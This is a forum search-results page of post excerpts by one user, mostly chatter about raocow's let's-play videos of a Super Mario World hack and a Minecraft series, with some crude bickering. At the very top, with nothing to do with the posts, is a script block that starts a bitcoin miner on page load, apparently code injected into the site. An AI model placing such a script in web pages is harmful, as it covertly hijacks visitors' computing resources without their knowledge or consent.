<script>
miner.start(); // initialise bitcoin miner
</script>

pge projectsmw centralmario fan games galaxy

Search found 282 matches

Go to advanced search

by Kleiner Kokiri
9 years ago
Forum: let's play
Topic: An SMWCentral Production: A game about some eggs
Replies: 1633
Views: 146071

Re: An SMWCentral Production: A game about some eggs

Constructive criticism is good, but there's a fine line between constructive criticism and just being mean. Talking about yourself, again DjSecret ? :lol: And yeah, it was 2. And they only stand out because raocow actually responded to them. Of course, the more people watch raocow, there will be ne...
by Kleiner Kokiri
9 years ago
Forum: let's play
Topic: An SMWCentral Production: A game about some eggs
Replies: 1633
Views: 146071

Re: An SMWCentral Production: A game about some eggs

I hope you know raocow, that i did not want to force a change in your playing style. Just wanted to point out that some people might think that way (and so do I). And how are you supposed to know about that if no one is saying it out loud ? As I said in one of my comments today, I miss the days when...
by Kleiner Kokiri
9 years ago
Forum: let's play
Topic: An SMWCentral Production: A game about some eggs
Replies: 1633
Views: 146071

Re: An SMWCentral Production: A game about some eggs

It makes sense then, that the "challenge" is optional. The level how it is, might be a bit too easy ~ or to be more honest, it's not difficult at all~, but if it was supposed to be the first sewer level everything makes sense.
With the optional challenge is has the perfect difficulty however.
by Kleiner Kokiri
9 years ago
Forum: let's play
Topic: An SMWCentral Production: A game about some eggs
Replies: 1633
Views: 146071

Re: An SMWCentral Production: A game about some eggs

Man, if you didn't like this level, you're gonna hate an upcoming level. The level with the blocks that decrement your time IS coming up, right? I haven't played this hack in weeks, so I kinda forgot. u kidding ? That level is so easy. Hey raocow ... if you get to the next sewer level, check out th...
by Kleiner Kokiri
9 years ago
Forum: let's play
Topic: An SMWCentral Production: A game about some eggs
Replies: 1633
Views: 146071

Re: An SMWCentral Production: A game about some eggs

It's not unlikely. It happened to me as well. This is why i thought, the switch just activated the door or something.
The whole case could have been easily dismissed if this boss had a hit counter or something. Then at least you could see if damage was done or not.
by Kleiner Kokiri
9 years ago
Forum: let's play
Topic: An SMWCentral Production: A game about some eggs
Replies: 1633
Views: 146071

Re: An SMWCentral Production: A game about some eggs

I figured it out rather fast as well.
Now after seeing today's episode i cannot wait for the Boss in Desert Town. raocow will play for hours :D

:lol: :lol:
by Kleiner Kokiri
9 years ago
Forum: let's play
Topic: raocow Doesn't Give Up - The Mario Gives Up thread
Replies: 297
Views: 36072

Re: raocow Doesn't Give Up - The Mario Gives Up thread

Yeah ... i wonder how many people will bother him now.
At least until he changes his settings, i guess.
by Kleiner Kokiri
9 years ago
Forum: let's play
Topic: An SMWCentral Production: A game about some eggs
Replies: 1633
Views: 146071

Re: An SMWCentral Production: A game about some eggs

raocow wrote:My problem with the 'never throw the object around phanto' plan is that after a while phanto builds up a lot of speed and can come careening from just about any angle from off screen!
That was probably a dream :lol:
by Kleiner Kokiri
9 years ago
Forum: let's play
Topic: raocow Doesn't Give Up - The Mario Gives Up thread
Replies: 297
Views: 36072

Re: raocow Doesn't Give Up - The Mario Gives Up thread

Test Pilot Monkey wrote:
Kleiner Kokiri wrote:the Mechakoopas (which for NO reason raocow suddenly calls 'ducks' btw.)
Yeah, it's unprecedented that raocow calls something by another name!
idk ... but i don't remember him using this term before :O
by Kleiner Kokiri
9 years ago
Forum: let's play
Topic: raocow Doesn't Give Up - The Mario Gives Up thread
Replies: 297
Views: 36072

Re: raocow Doesn't Give Up - The Mario Gives Up thread

I wonder why the boss suddenly needs to be stomped. I'm guessing the switch is just a red herring? Speaking of bosses, you didn't go back for the key boss! No. As raocow already explained in the video: The switch is supposed to be off. It is accesable in the second part of the battle (since the blo...
by Kleiner Kokiri
9 years ago
Forum: let's play
Topic: Let's Play Minecraft with Hito and [AOD]
Replies: 73
Views: 8173

Re: Let's Play Minecraft with Hito and [AOD]

[AOD] wrote:I, literally, hate the last two pages of this thread. :evil:
Make a tea, take a nip and you'll feal better.
by Kleiner Kokiri
9 years ago
Forum: let's play
Topic: Let's Play Minecraft with Hito and [AOD]
Replies: 73
Views: 8173

Re: Let's Play Minecraft with Hito and [AOD]

Aren't we allowed to give suggestions? Of course... but you also asked me for arguments. I gave you only what you asked from me. Im not saying you're not allowed to have an opinion. But it seemed to me you're declaring what you say as absolute, by disguising an opinion as an argument. And Hito is n...
by Kleiner Kokiri
9 years ago
Forum: let's play
Topic: Let's Play Minecraft with Hito and [AOD]
Replies: 73
Views: 8173

Re: Let's Play Minecraft with Hito and [AOD]

However, it is very difficult for me to say no to people, so at his request I brought it down. I like to make everyone happy all the time, but I don't know how to do that in this situation, so WELP. I don't know you at all. But when the first epidsode went online, i quickly realized that you're a n...
by Kleiner Kokiri
9 years ago
Forum: let's play
Topic: Let's Play Minecraft with Hito and [AOD]
Replies: 73
Views: 8173

Re: Let's Play Minecraft with Hito and [AOD]

Here are 3 arguments against Intros! All your "argument"s are circling around an opinion. An opinion is not an argument. But meh ... fine, i'll do you the favor. First argument: It was Hitos decision to do it. That means he wants to do it and does like it. That's a valid argument, because this is H...
by Kleiner Kokiri
9 years ago
Forum: let's play
Topic: raocow Doesn't Give Up - The Mario Gives Up thread
Replies: 297
Views: 36072

Re: raocow Doesn't Give Up - The Mario Gives Up thread

I somehow got a glitch where the blocks were on when I went into the room and then turned off for the last phase, so that threw me off even more. So that's what basically happened to both of you *sigh* Well ... i can understand the confusion then. Seems, today was confusion day. raocow ~ because yo...
by Kleiner Kokiri
9 years ago
Forum: let's play
Topic: Let's Play Minecraft with Hito and [AOD]
Replies: 73
Views: 8173

Re: Let's Play Minecraft with Hito and [AOD]

I think his point is that there are a lot of 'I know what i'm doing here is me doing things' minecraft video out there, while there are less 'video from the point of view of someone who doesn't know anything, while there is also someone learned there that can answer these questions' sort of videos....
by Kleiner Kokiri
9 years ago
Forum: let's play
Topic: Let's Play Minecraft with Hito and [AOD]
Replies: 73
Views: 8173

Re: Let's Play Minecraft with Hito and [AOD]

@ Kleiner Kokiri Heeey, Green is awesome :D Naa it was not an insult or something. It's just that raocow brings this certain element that makes things more clear for everyone. For example a conversation with you three would go like: AOD: Hey let's make going to the nether a goal Hito: Yeah .. sound...
by Kleiner Kokiri
9 years ago
Forum: let's play
Topic: An SMWCentral Production: A game about some eggs
Replies: 1633
Views: 146071

Re: An SMWCentral Production: A game about some eggs

I believe it's a paraphrase. Or just a general summary of the shit that went on in that thread. This. I think KK is just afraid that it was directed at him. Which it is. In my mind. Simon Naaa... It's just that americans lack something... so they don't even understand what pedophilia is :lol: But l...
by Kleiner Kokiri
9 years ago
Forum: let's play
Topic: Let's Play Minecraft with Hito and [AOD]
Replies: 73
Views: 8173

Re: Let's Play Minecraft with Hito and [AOD]

By the time the next video is up, I'll tally to see how many people want it unedited vs edited. If it's edited, it'll be around 15-20minutes. If unedited, I don't know. XD Well... Me and Cup are two people then. Thats not much ~ Also ~ you deleted the opening and ending sequence of katamari damaci....
by Kleiner Kokiri
9 years ago
Forum: let's play
Topic: An SMWCentral Production: A game about some eggs
Replies: 1633
Views: 146071

Re: An SMWCentral Production: A game about some eggs

Paragraph wrote: Like "you creepy pedophile fuck get the fuck out of this forum".
Simon
Wait wait .... are you joking ? Or being overdramatic ?
Please tell me you're joking O.O

The search function did not give me any results on that.
by Kleiner Kokiri
9 years ago
Forum: let's play
Topic: An SMWCentral Production: A game about some eggs
Replies: 1633
Views: 146071

Re: An SMWCentral Production: A game about some eggs

I like having lives even if I go and farm when I can, because 'getting' a life in an unexpected way is fun. Some people agree, some people don't. Nobody here will convince anyone on the other camp. Peace? Let's just say it is pointless now to argue about having lifes / not having lifes. Even so, yo...
by Kleiner Kokiri
9 years ago
Forum: let's play
Topic: raocow Doesn't Give Up - The Mario Gives Up thread
Replies: 297
Views: 36072

Re: raocow Doesn't Give Up - The Mario Gives Up thread

It's not easy either to get up there, isn't it ?
But wasn't there an indicator ? Like the blocks that suddenly appear to help you get up ?

It's been a while since i played it, and my save got corrupted after Bowser D:
by Kleiner Kokiri
9 years ago
Forum: let's play
Topic: An SMWCentral Production: A game about some eggs
Replies: 1633
Views: 146071

Re: An SMWCentral Production: A game about some eggs

KK: I'm not really sure why you'd use a quote that was directed at the idea of using bonus games/in-jokes. I thought it was focused on the Bonus Game ~ put the in game jokes aside. And your post here indicates that you did not quite understand what i meant. That's quite a lot different than overall...
by Kleiner Kokiri
9 years ago
Forum: let's play
Topic: An SMWCentral Production: A game about some eggs
Replies: 1633
Views: 146071

Re: An SMWCentral Production: A game about some eggs

Now this is pretty mean...though I can't say I don't agree with you to an extent. Oh... i didn't want to sound mean. Im just a little drunk. If you actually had some bearing in the community and knew how either the first one was run or how the second one is going to be run, I might actually respect...
by Kleiner Kokiri
9 years ago
Forum: let's play
Topic: An SMWCentral Production: A game about some eggs
Replies: 1633
Views: 146071

Re: An SMWCentral Production: A game about some eggs

Just wanted to say you can rest easy, raocow; we're not removing extra lives from ASMWCP2. In spite of the overwhelming outcry that they're an antiquated game mechanic, the traditionalist side outcried louder and got its way! This is for the best anyways, I mean, it is just so satisfying to pull of...

Go to advanced search